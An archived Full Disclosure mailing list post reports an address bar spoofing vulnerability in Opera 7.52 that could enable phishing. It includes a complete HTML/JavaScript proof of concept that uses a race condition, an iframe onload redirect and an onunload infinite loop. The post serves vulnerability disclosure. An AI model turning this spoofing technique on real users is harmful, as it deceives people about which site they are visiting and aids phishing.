Full Disclosure mailing list archives

Previous By Date Next
Previous By Thread Next

Opera 7.52 (Build 3834) Address Bar Spoofing Issue

From: "bitlance winter" <bitlance_3 () hotmail com>
Date: Thu, 08 Jul 2004 08:48:23 +0000
Hi List.
A vulnerability is found in the Opera browser version 7.52 , which potentially can be exploited by malicious people to conduct phishing attacks against a user. 

The issue may be caused due to a race condition and will sometimes
make it possible to display spoofed information in the address bar
via a specially crafted HTML document.

Tested on WindowsXP SP1.

Demonstration HTML source code:

======== begin ========

[!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"]
[html lang="en"]
[head]
[meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1"]
[meta http-equiv="Content-Script-Type" content="text/javascript"]
[meta http-equiv="Content-Style-Type" content="text/css"]
[title]Opera 7.52 Address Bar Spoofing Vulnerability[/title]
[style type="text/css"]
[!-- /* begin */
 h1 { font-size:120%;}
 h2 { font-size:100%;}
/* end */ --]
[/style]
[script type="text/javascript"]
[!--
function urlfake(){
location.href="http://www.microsoft.com/";;
}
function preinline () {
myvar = '[iframe onload="urlfake()" ';
myvar = myvar +  'title="preload inline frame" ';
myvar = myvar + 'src="http://www.opera.com/"; ';
myvar = myvar +  'frameborder="0" width="760" height="1800" ';
myvar = myvar +  'marginwidth="0" marginheight="0"]';
myvar = myvar +  '[' + '/iframe]';
document.write (myvar);
}
// --]
[/script]
[/head]
[body onunload="while(1){};"]
[h1]Opera Browser 7.52 (Build 3834) Address Bar Spoofing Issue[/h1]
[h2]Tested on WindowsXP SP1[/h2]
[p]
[script type="text/javascript"]
[!--
preinline ();
// --]
[/script]
[/p]
[/body]
[/html]
========= end =========
(Sorry,too long code.)

Thank you, List.

--
bitlance winter

_________________________________________________________________
FREE pop-up blocking with the new MSN Toolbar – get it now! http://toolbar.msn.click-url.com/go/onm00200415ave/direct/01/ 

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
Previous By Date Next
Previous By Thread Next

Current thread: